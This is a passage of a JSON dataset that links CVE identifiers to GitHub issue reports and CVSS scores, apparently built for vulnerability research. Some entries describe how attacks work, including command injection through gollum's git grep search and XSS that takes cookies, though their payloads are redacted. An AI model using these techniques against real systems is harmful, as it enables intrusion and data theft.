        "Repo_new": "keycloak/keycloak",
        "Issue_Created_At": "2022-07-05T22:29:01Z",
        "description": "Contact APITAG Product Security Team and ask them to update CVETAG . Description CVEs can now be updated by a CNA and Red Hat, the major sponsor of Keycloak is now a CNA, that means updating CVEs for accuracy should be easier (yeay). CVETAG CVETAG refers to an old sibling project that was deprecated ages ago. It should be re assigned to that product or at least have a fix the CVE to reflect its status as affecting not Keycloak but Gatekeeper",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L",
        "severity": "HIGH",
        "baseScore": 7.3,
        "impactScore": 3.4,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2020-14040",
        "Issue_Url_old": "https://github.com/golang/go/issues/39491",
        "Issue_Url_new": "https://github.com/golang/go/issues/39491",
        "Repo_new": "golang/go",
        "Issue_Created_At": "2020-06-09T22:14:39Z",
        "description": "x/text: UTF NUMBERTAG decoder behaves incorrectly on single byte input. When using UTF NUMBERTAG decoder with BOM to decode a single byte string, the decoder incorrectly returns APITAG . This code can be used to reproduce this issue: ERRORTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2022-24686",
        "Issue_Url_old": "https://github.com/hashicorp/nomad/issues/12036",
        "Issue_Url_new": "https://github.com/hashicorp/nomad/issues/12036",
        "Repo_new": "hashicorp/nomad",
        "Issue_Created_At": "2022-02-09T23:52:57Z",
        "description": "placeholder.",
        "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:H/A:N",
        "severity": "MEDIUM",
        "baseScore": 5.9,
        "impactScore": 3.6,
        "exploitabilityScore": 2.2
    },
    {
        "CVE_ID": "CVE-2019-10214",
        "Issue_Url_old": "https://github.com/containers/image/issues/654",
        "Issue_Url_new": "https://github.com/containers/image/issues/654",
        "Repo_new": "containers/image",
        "Issue_Created_At": "2019-07-11T10:50:18Z",
        "description": "podman login not working with certificate authentication. Hi, we have an Artifactory running behind a load balancer that uses certificate authentication. When we try to podman login we get the error ERRORTAG When using docker login the login succeeds. When using podman login it tries to reuse the existing login but also fails again: ERRORTAG I guess that the error is probably in this area as the certificates from the APITAG are not used: URLTAG I will try to fix it in the next days but I'm not very familiar with the code base yet so if you see an easy fix we would appreciate that, otherwise I would also appreciate some guidance. Thanks!",
        "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N",
        "severity": "MEDIUM",
        "baseScore": 5.9,
        "impactScore": 3.6,
        "exploitabilityScore": 2.2
    },
    {
        "CVE_ID": "CVE-2002-20001",
        "Issue_Url_old": "https://github.com/mozilla/ssl-config-generator/issues/162",
        "Issue_Url_new": "https://github.com/mozilla/ssl-config-generator/issues/162",
        "Repo_new": "mozilla/ssl-config-generator",
        "Issue_Created_At": "2021-10-23T22:32:53Z",
        "description": "Stop recommending DHE, because of \"dheater\" vulnerability. These guys URLTAG found a way to saturate the server CPU core to NUMBERTAG using as little as NUMBERTAG KB/s of incoming traffic. The pre requisite is that the server supports DHE as the key exchange. Therefore, to avoid creating such a vulnerable configuration, I propose removing DHE from all levels of SSL config.",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2012-6685",
        "Issue_Url_old": "https://github.com/sparklemotion/nokogiri/issues/693",
        "Issue_Url_new": "https://github.com/sparklemotion/nokogiri/issues/693",
        "Repo_new": "sparklemotion/nokogiri",
        "Issue_Created_At": "2012-06-06T09:34:24Z",
        "description": "nokogiri vulnerable to XXE attack when used under c ruby. Using external xml entities you can specify URLs (e.g. HTTP) to be contacted when attacker supplied XML is parsed. This can be used to trigger URLs on the internal network of a XML parsing service and potentially leak their responses. External xml entities should be completely (file, http, etc.) disabled. CODETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2013-20001",
        "Issue_Url_old": "https://github.com/openzfs/zfs/issues/1894",
        "Issue_Url_new": "https://github.com/openzfs/zfs/issues/1894",
        "Repo_new": "openzfs/zfs",
        "Issue_Created_At": "2013-11-22T15:08:00Z",
        "description": "sharenfs and IP NUMBERTAG on Ubuntu NUMBERTAG I am trying to share a zfs filesystem over both IP NUMBERTAG and IP NUMBERTAG but just cannot get it to work. I know the support is there in native NFS, as it works fine for non zfs filesystems. Here is an example: > sudo zfs set PATHTAG disk1/home > sudo exportfs a > showmount e > /home NUMBERTAG home NUMBERTAG home NUMBERTAG home NUMBERTAG home APITAG I have tried the address both with and w/o square brackets, it doesn't make any difference. Any ideas if there is a magic syntax for IP NUMBERTAG addresses? Or is this just a bug/",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2013-4144",
        "Issue_Url_old": "https://github.com/wordpress/secure-swfupload/issues/1",
        "Issue_Url_new": "https://github.com/wordpress/secure-swfupload/issues/1",
        "Repo_new": "wordpress/secure-swfupload",
        "Issue_Created_At": "2013-07-03T18:00:54Z",
        "description": "Image object injection vulnerability via APITAG parameter. I've received a few reports today of an image object injection problem in swfupload affecting APITAG I'm filing this public issue here after contacting swfupload EMAILTAG rg and being asked to do so (as this issue is already public knowledge). There's an object injection \"vulnerability\" in swfupload, as shown by this demo URL: FILETAG Known advisories for this issue: URLTAG FILETAG This was tested on APITAG NUMBERTAG As discussed on e mail, there are three basic options: Remove APITAG Restrict APITAG to same origin Ignore the issue My recommendation would be to restrict APITAG to the same origin as the blog site, as swfupload is already deprecated, and I'd rather it be secure but slightly broken than have a known issue that could be used for spoofing or other issues. Thanks!",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2014-8174",
        "Issue_Url_old": "https://github.com/redhat-cip/edeploy/issues/230",
        "Issue_Url_new": "https://github.com/redhat-cip/edeploy/issues/230",
        "Repo_new": "redhat-cip/edeploy",
        "Issue_Created_At": "2015-03-17T23:23:07Z",
        "description": "use of HTTP to download sensitive files CVETAG . Found in a past security audit, agreed with Tristan to make public and file issues here. Please see CVETAG edeploy uses HTTP to download a large number of sensitive files which can lead to code execution: PATHTAG value=http://{{ APITAG }}/ PATHTAG echo APITAG { Retries NUMBERTAG HTTP { Proxy URLTAG {HTTP_PROXY} ; }; };\" >> PATHTAG PATHTAG curl o PATHTAG FILETAG ~bpo NUMBERTAG ARCH:=amd NUMBERTAG deb PATHTAG echo \"deb URLTAG $dist security main universe multiverse\" >> PATHTAG PATHTAG echo \"deb FILETAG $dist/updates main\" > PATHTAG PATHTAG wget O FILETAG | do_chroot $target apt key add PATHTAG echo \"deb URLTAG ${dist} main\" > PATHTAG PATHTAG wget O FILETAG | do_chroot $target apt key add PATHTAG echo \"deb URLTAG precise main\" > PATHTAG PATHTAG wget O FILETAG | do_chroot $target apt key add PATHTAG echo \"deb URLTAG ${dist} main\" > PATHTAG PATHTAG wget no verbose URLTAG O PATHTAG PATHTAG FILETAG PATHTAG do_chroot $dir rpm import FILETAG PATHTAG do_chroot $dir rpm import FILETAG PATHTAG URLTAG PATHTAG wget no verbose URLTAG PATHTAG PACKAGES=\"$PACKAGES numpy FILETAG \" PATHTAG PACKAGES=\"$PACKAGES python psutil FILETAG FILETAG \" PATHTAG PACKAGES=\"$PACKAGES FILETAG FILETAG \" PATHTAG curl s S o/configure F section=${SECTION} F FILETAG URLTAG PATHTAG & PATHTAG give_up APITAG exited as failed ($RET_CODE). Cannot get a configuration from URLTAG PATHTAG PATHTAG log APITAG files from URLTAG PATHTAG PATHTAG curl s S URLTAG PATHTAG | gzip d | tar x xattrs selinux C $d || give_up APITAG to download URLTAG PATHTAG PATHTAG curl URLTAG fso /user data m NUMBERTAG retry NUMBERTAG retry delay NUMBERTAG PATHTAG curl s S APITAG F section=${SECTION} F file= APITAG URLTAG PATHTAG || : PATHTAG curl s S F section=${SECTION} F failure=$PROFILE F FILETAG URLTAG PATHTAG PATHTAG s S $SESSION_CURL F FILETAG URLTAG PATHTAG & PATHTAG log APITAG exited as failed ($RET_CODE). Cannot get a configuration from URLTAG PATHTAG PATHTAG PACKAGES=\"$PACKAGES FILETAG \" PATHTAG echo \" URLTAG \" PATHTAG echo \" URLTAG \" PATHTAG echo \" FILETAG \" PATHTAG echo \" FILETAG \" PATHTAG wget \" FILETAG \" O PATHTAG Binary file PATHTAG matches PATHTAG URLTAG PATHTAG curl i F name=test F PATHTAG FILETAG PATHTAG curl i F name=test F PATHTAG FILETAG . APITAG page = FILETAG PATHTAG Command line: BOOT_IMAGE=vmlinuz initrd= FILETAG DEBUG NUMBERTAG APITAG APITAG UPLOAD_LOG NUMBERTAG IP=all:dhcp SESSION=smoke NONETWORKTEST NUMBERTAG ONSUCCESS=console ONFAILURE=console |pci=bfsort| PATHTAG Kernel command line: BOOT_IMAGE=vmlinuz initrd= FILETAG DEBUG NUMBERTAG APITAG APITAG UPLOAD_LOG NUMBERTAG IP=all:dhcp SESSION=smoke NONETWORKTEST NUMBERTAG ONSUCCESS=console ONFAILURE=console |pci=bfsort|",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2014-9489",
        "Issue_Url_old": "https://github.com/gollum/gollum/issues/913",
        "Issue_Url_new": "https://github.com/gollum/gollum/issues/913",
        "Repo_new": "gollum/gollum",
        "Issue_Created_At": "2014-12-04T13:54:16Z",
        "description": "APITAG Remote Code Execution Vulnerability, please update. There was a remote code execution vulnerability in versions of gollum < APITAG (just released). Technically, the bug was in the APITAG gem dependency which was introduced in APITAG , but I suspect that the same exploitable code existed in the APITAG dependency before that version (untested). Please update gollum to APITAG ( gem update gollum ): that will update the dependencies. (If anyone uses APITAG without the gollum frontend, please APITAG ). The bug exploits the fact that grit uses command line calls to git grep to implement search functionality. git grep takes a APITAG or APITAG option that will basically pipe the results of grep to an arbitrary process. For example, in vulnerable versions of gollum, searching for APITAG creates the file APITAG (but any arbitrary command will work, so that an attacker could setup shell access to the exploited server). However, this will only work if grep finds the string master (or whatever is the default branch that gollum uses) in any of the wiki's documents. See here for the vulnerable code and fix: URLTAG Many thanks to MENTIONTAG for reporting this. MENTIONTAG MENTIONTAG MENTIONTAG please have a look and see if I didn't miss anything. One more reason to ditch grit in favour of rugged. EDIT: fixed gollum version numbers",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2015-20107",
        "Issue_Url_old": "https://github.com/python/cpython/issues/68966",
        "Issue_Url_new": "https://github.com/python/cpython/issues/68966",
        "Repo_new": "python/cpython",
        "Issue_Created_At": "2015-08-02T08:25:07Z",
        "description": "APITAG document shell command Injection danger in filename parameter. BPO NUMBERTAG CVETAG | : Nosy | MENTIONTAG MENTIONTAG Files | APITAG CVETAG APITAG as image/png at NUMBERTAG by APITAG APITAG APITAG Quote APITAG CVETAG APITAG as text/plain at NUMBERTAG by APITAG APITAG APITAG [mailcap APITAG CVETAG APITAG as application/zip at NUMBERTAG by APITAG mailcap.py patches and diffs for python NUMBERTAG and python NUMBERTAG APITAG APITAG Note: these values reflect the state of the issue at the time it was migrated and might not reflect the current state. APITAG APITAG more details APITAG APITAG APITAG fields: ERRORTAG APITAG fields: ERRORTAG APITAG APITAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:H/A:L",
        "severity": "HIGH",
        "baseScore": 7.6,
        "impactScore": 4.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2015-3206",
        "Issue_Url_old": "https://github.com/apple/ccs-pykerberos/issues/31",
        "Issue_Url_new": "https://github.com/apple/ccs-pykerberos/issues/31",
        "Repo_new": "apple/ccs-pykerberos",
        "Issue_Created_At": "2014-01-25T00:01:14Z",
        "description": "APITAG is insecure. _res APITAG originally submitted this as _ ticket NUMBERTAG URLTAG _ The python kerberos APITAG method is badly insecure. It does a kinit (AS REQ) to ask a KDC for a TGT for the given user principal, and interprets the success or failure of that as indicating whether the password is correct. It does not, however, verify that it actually spoke to a trusted KDC: an attacker may simply reply instead with an AS REP which matches the password he just gave you. Imagine you were verifying a password using LDAP authentication rather than Kerberos: you would, of course, use TLS in conjunction with LDAP to make sure you were talking to a real, trusted LDAP server. The same requirement applies here. kinit is not a password verification service. The usual way of doing this is to take the TGT you've obtained with the user's password, and then obtain a ticket for a principal for which the verifier has keys (e.g. a web server processing a username/password form login might get a ticket for its own HTTP/host MENTIONTAG principal), which it can then verify. Note that this requires that the verifier have its own Kerberos identity, which is mandated by the symmetric nature of Kerberos (whereas in the LDAP case, the use of public key cryptography allows anonymous verification). If this is not implemented, the documentation should at least indicate that there is no protection against KDC spoofing attacks here.",
        "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.1,
        "impactScore": 5.9,
        "exploitabilityScore": 2.2
    },
    {
        "CVE_ID": "CVE-2015-4054",
        "Issue_Url_old": "https://github.com/pgbouncer/pgbouncer/issues/42",
        "Issue_Url_new": "https://github.com/pgbouncer/pgbouncer/issues/42",
        "Repo_new": "pgbouncer/pgbouncer",
        "Issue_Created_At": "2015-03-26T15:11:10Z",
        "description": "pgbouncer NUMBERTAG segmentation fault. Hello, we're suffering from a segmentation fault every now and than on APITAG NUMBERTAG with pgbouncer NUMBERTAG The instance is dying with the following message: pgbouncer NUMBERTAG segfault at NUMBERTAG ip NUMBERTAG d NUMBERTAG sp NUMBERTAG fffa NUMBERTAG ea NUMBERTAG error NUMBERTAG in pgbouncer NUMBERTAG pgbouncer NUMBERTAG segfault at NUMBERTAG ip NUMBERTAG d NUMBERTAG sp NUMBERTAG fff NUMBERTAG fbe7b0 error NUMBERTAG in pgbouncer NUMBERTAG pgbouncer NUMBERTAG segfault at NUMBERTAG ip NUMBERTAG d NUMBERTAG sp NUMBERTAG fffaf NUMBERTAG a NUMBERTAG error NUMBERTAG in pgbouncer NUMBERTAG pgbouncer NUMBERTAG segfault at NUMBERTAG ip NUMBERTAG d NUMBERTAG sp NUMBERTAG fffbd NUMBERTAG error NUMBERTAG in pgbouncer NUMBERTAG pgbouncer NUMBERTAG segfault at NUMBERTAG ip NUMBERTAG d NUMBERTAG sp NUMBERTAG ffffe0dc2c0 error NUMBERTAG in pgbouncer NUMBERTAG We've attached gdb to a core file and traced the issue down to an uninitialized struct: Program terminated with signal NUMBERTAG Segmentation fault NUMBERTAG d NUMBERTAG in check_client_passwd (client NUMBERTAG f NUMBERTAG pkt NUMBERTAG ffffe0dc NUMBERTAG at APITAG NUMBERTAG src/client.c: No such file or directory. in src/client.c Missing separate debuginfos, use: debuginfo install glibc NUMBERTAG APITAG libevent NUMBERTAG APITAG nss softokn freebl NUMBERTAG APITAG (gdb) bt NUMBERTAG d NUMBERTAG in check_client_passwd (client NUMBERTAG f NUMBERTAG pkt NUMBERTAG ffffe0dc NUMBERTAG at APITAG NUMBERTAG handle_client_startup (client NUMBERTAG f NUMBERTAG pkt NUMBERTAG ffffe0dc NUMBERTAG at APITAG NUMBERTAG in client_proto (sbuf NUMBERTAG f NUMBERTAG evtype=<value optimized out>, data=<value optimized out>) at APITAG NUMBERTAG e in sbuf_call_proto (sbuf=<value optimized out>, event=<value optimized out>) at APITAG NUMBERTAG bb in sbuf_process_pending (sbuf NUMBERTAG f NUMBERTAG at APITAG NUMBERTAG a8 in sbuf_main_loop (sbuf NUMBERTAG f NUMBERTAG skip_recv=<value optimized out>) at APITAG NUMBERTAG in sbuf_accept (sbuf NUMBERTAG f NUMBERTAG sock=<value optimized out>, is_unix=false) at APITAG NUMBERTAG b NUMBERTAG in accept_client (sock NUMBERTAG is_unix=false) at APITAG NUMBERTAG eafc in pool_accept (sock NUMBERTAG flags=<value optimized out>, arg=<value optimized out>) at APITAG NUMBERTAG f NUMBERTAG b NUMBERTAG in event_base_loop () from PATHTAG NUMBERTAG a3 in main_loop_once () at APITAG NUMBERTAG e NUMBERTAG in main (argc=<value optimized out>, argv=<value optimized out>) at APITAG after looking at APITAG we see that the passwd var is valid however the APITAG struct (or APITAG struct) must be invalid: (gdb) printf \"%s\", passwd md5XXXXXXXXXXXXXXXXXXXXXXXXX (gdb) printf \"%s\", user >passwd Cannot access memory at address NUMBERTAG The application log does not show any conclusive info. Please tell me if you need more information. Thanks for help, Wiktor",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2015-8916",
        "Issue_Url_old": "https://github.com/libarchive/libarchive/issues/504",
        "Issue_Url_new": "https://github.com/libarchive/libarchive/issues/504",
        "Repo_new": "libarchive/libarchive",
        "Issue_Created_At": "2015-04-11T17:16:06Z",
        "description": "malformed rar crashes bsdtar. Original issue NUMBERTAG URLTAG created by Google Code user APITAG on NUMBERTAG APITAG CODETAG See attachment: FILETAG See attachment: FILETAG See attachment: FILETAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2015-8917",
        "Issue_Url_old": "https://github.com/libarchive/libarchive/issues/505",
        "Issue_Url_new": "https://github.com/libarchive/libarchive/issues/505",
        "Repo_new": "libarchive/libarchive",
        "Issue_Created_At": "2015-04-11T17:16:11Z",
        "description": "malformed cab segfaults bsdtar. Original issue NUMBERTAG URLTAG created by Google Code user APITAG on NUMBERTAG APITAG CODETAG See attachment: FILETAG See attachment: FILETAG See attachment: FILETAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2015-8927",
        "Issue_Url_old": "https://github.com/libarchive/libarchive/issues/523",
        "Issue_Url_new": "https://github.com/libarchive/libarchive/issues/523",
        "Repo_new": "libarchive/libarchive",
        "Issue_Created_At": "2015-04-11T17:17:10Z",
        "description": "Invalid memory read on zip file in function APITAG after entering empty password. Original issue NUMBERTAG URLTAG created by Google Code user APITAG on NUMBERTAG APITAG ERRORTAG See attachment: FILETAG See attachment: FILETAG",
        "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2015-8929",
        "Issue_Url_old": "https://github.com/libarchive/libarchive/issues/517",
        "Issue_Url_new": "https://github.com/libarchive/libarchive/issues/517",
        "Repo_new": "libarchive/libarchive",
        "Issue_Created_At": "2015-04-11T17:16:46Z",
        "description": "memory leak in __archive_read_get_extract. Original issue NUMBERTAG URLTAG created by Google Code user APITAG on NUMBERTAG APITAG CODETAG",
        "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2015-8930",
        "Issue_Url_old": "https://github.com/libarchive/libarchive/issues/522",
        "Issue_Url_new": "https://github.com/libarchive/libarchive/issues/522",
        "Repo_new": "libarchive/libarchive",
        "Issue_Created_At": "2015-04-11T17:17:10Z",
        "description": "Malformed ISO file hangs bsdtar. Original issue NUMBERTAG URLTAG created by Google Code user APITAG on NUMBERTAG APITAG APITAG See attachment: FILETAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2015-8934",
        "Issue_Url_old": "https://github.com/libarchive/libarchive/issues/521",
        "Issue_Url_new": "https://github.com/libarchive/libarchive/issues/521",
        "Repo_new": "libarchive/libarchive",
        "Issue_Created_At": "2015-04-11T17:17:10Z",
        "description": "Invalid read in function APITAG when unpacking malformed rar. Original issue NUMBERTAG URLTAG created by Google Code user APITAG on NUMBERTAG APITAG ERRORTAG See attachment: FILETAG See attachment: FILETAG",
        "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2015-9537",
        "Issue_Url_old": "https://github.com/cybersecurityworks/Disclosed/issues/1",
        "Issue_Url_new": "https://github.com/cybersecurityworks/disclosed/issues/1",
        "Repo_new": "cybersecurityworks/disclosed",
        "Issue_Created_At": "2015-08-27T13:22:02Z",
        "description": "Multiple XSS in APITAG Gallery by Photocrati Version NUMBERTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 5.4,
        "impactScore": 2.7,
        "exploitabilityScore": 2.3
    },
    {
        "CVE_ID": "CVE-2016-10530",
        "Issue_Url_old": "https://github.com/airbrake/node-airbrake/issues/70",
        "Issue_Url_new": "https://github.com/airbrake/node-airbrake/issues/70",
        "Repo_new": "airbrake/node-airbrake",
        "Issue_Created_At": "2016-01-26T22:18:46Z",
        "description": "API should support SSL by default. We've run into a few issues where developers do not perform their due diligence and assume MENTIONTAG still supports http by default. This isn't the case and hasn't been for quite some time. I realize there are cases where NUMBERTAG rd party Airbrake compatible backends ( APITAG might support HTTP by default. However, from a security and perception standpoint the reverse should be true: HTTPS by default. I would like to suggest the following updates Change default hosts URLTAG Change default protocol URLTAG Update context to errors section in README URLTAG Update API docs in README URLTAG MENTIONTAG As the maintainer I'm curious what your thoughts are on these changes? I can submit a PR if you'd prefer to discuss these changes that way. /cc MENTIONTAG MENTIONTAG MENTIONTAG MENTIONTAG APITAG",
        "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N",
        "severity": "MEDIUM",
        "baseScore": 5.9,
        "impactScore": 3.6,
        "exploitabilityScore": 2.2
    },
    {
        "CVE_ID": "CVE-2016-1516",
        "Issue_Url_old": "https://github.com/opencv/opencv/issues/5956",
        "Issue_Url_new": "https://github.com/opencv/opencv/issues/5956",
        "Repo_new": "opencv/opencv",
        "Issue_Created_At": "2016-01-13T00:18:16Z",
        "description": "Remote code execution via heap corruption. We've isolated a couple bugs that could allow an attacker to achieve remote code execution on a victim's machine when processing an infected image with APITAG We have more details and would like to responsibly disclose this to a lead developer. Known vulnerable versions: Linux, APITAG NUMBERTAG Unverified but most likely works on all versions.",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2016-4069",
        "Issue_Url_old": "https://github.com/roundcube/roundcubemail/issues/4957",
        "Issue_Url_new": "https://github.com/roundcube/roundcubemail/issues/4957",
        "Repo_new": "roundcube/roundcubemail",
        "Issue_Created_At": "2016-01-16T16:36:53Z",
        "description": "Protect attachment downloads against CSRF. APITAG by MENTIONTAG on NUMBERTAG Jan NUMBERTAG UTC as Trac ticket NUMBERTAG Message attachments are downloaded via GET requests (with APITAG ) and therefore can be triggered by a NUMBERTAG rd party site with guessed URLs and an active session in the victims browser. While this doesn't disclose any data to the attacker site, it triggers unwanted file downloads and puts load on the server as well as fills the victims disk if executed repeatedly. We already have CSRF protection means with session based request tokens. Requiring such tokens on download urls would add the necessary protection against these unwanted downloads. APITAG From: URLTAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2016-9435",
        "Issue_Url_old": "https://github.com/tats/w3m/issues/16",
        "Issue_Url_new": "https://github.com/tats/w3m/issues/16",
        "Repo_new": "tats/w3m",
        "Issue_Created_At": "2016-08-17T09:09:22Z",
        "description": "valgrind found many issues about uninitialised value. There are many noise in libgc. I don't know they are valid or not, so just disable GC by GC_DONT_GC NUMBERTAG and ignore memory leak for now. Minimal test case: ERRORTAG There is different issue for APITAG ERRORTAG If feeding w3m more complex input, there are more. For example, ERRORTAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2017-14040",
        "Issue_Url_old": "https://github.com/uclouvain/openjpeg/issues/995",
        "Issue_Url_new": "https://github.com/uclouvain/openjpeg/issues/995",
        "Repo_new": "uclouvain/openjpeg",
        "Issue_Created_At": "2017-08-17T08:59:55Z",
        "description": "invalid memory write in tgatoimage (convert.c). On master: ERRORTAG Testcase: URLTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2017-16956",
        "Issue_Url_old": "https://github.com/b3log/symphony/issues/509",
        "Issue_Url_new": "https://github.com/b3log/symphony/issues/509",
        "Repo_new": "b3log/symphony",
        "Issue_Created_At": "2017-11-23T16:12:02Z",
        "description": "Article exists XSS vulnerability. Hi,man.We meet again. Get to the APITAG problem appears in the article. My test environment symphony version : latest OS : APITAG NUMBERTAG Browser : APITAG Tool : APITAG Data : APITAG NUMBERTAG PM Vulnerability details Location : /article/ send private letter to anyone : APITAG I changed the value of this letter's title to xss payload APITAG and then send it. You must send two private APITAG will trigger vulnerability. Open one of the letters APITAG : APITAG Attack When person open the link, I can get their cookies. HTML code : APITAG APITAG Vulnerability Reporter : vulkey(mstsec)",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2017-17514",
        "Issue_Url_old": "https://github.com/jcupitt/nip2/issues/70",
        "Issue_Url_new": "https://github.com/libvips/nip2/issues/70",
        "Repo_new": "libvips/nip2",
        "Issue_Created_At": "2017-12-15T08:48:31Z",
        "description": "CVETAG : shell argument injection via crafted URL. Hi John, CVETAG CVETAG showed up today: > boxes.c in nip NUMBERTAG does not validate strings before launching the program specified by the BROWSER environment variable, which might allow remote attackers to conduct argument injection attacks via a crafted URL. Except for the Debian security tracker page URLTAG , I can find no information about it, so I'm guessing you weren't informed either NUMBERTAG is apparently the last version packaged by Debian, but later nip2 releases also carry the same code. In case it's useful, there's a form for submitting FILETAG to CVE records.",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2017-2809",
        "Issue_Url_old": "https://github.com/tomoh1r/ansible-vault/issues/4",
        "Issue_Url_new": "https://github.com/tomoh1r/ansible-vault/issues/4",
        "Repo_new": "tomoh1r/ansible-vault",
        "Issue_Created_At": "2017-05-09T15:27:43Z",
        "description": "Security issue. Please provide contact/information on reporting security issues for Ansible vault",
        "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 7.8,
        "impactScore": 5.9,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2017-5835",
        "Issue_Url_old": "https://github.com/libimobiledevice/libplist/issues/88",
        "Issue_Url_new": "https://github.com/libimobiledevice/libplist/issues/88",
        "Repo_new": "libimobiledevice/libplist",
        "Issue_Created_At": "2017-01-18T02:08:26Z",
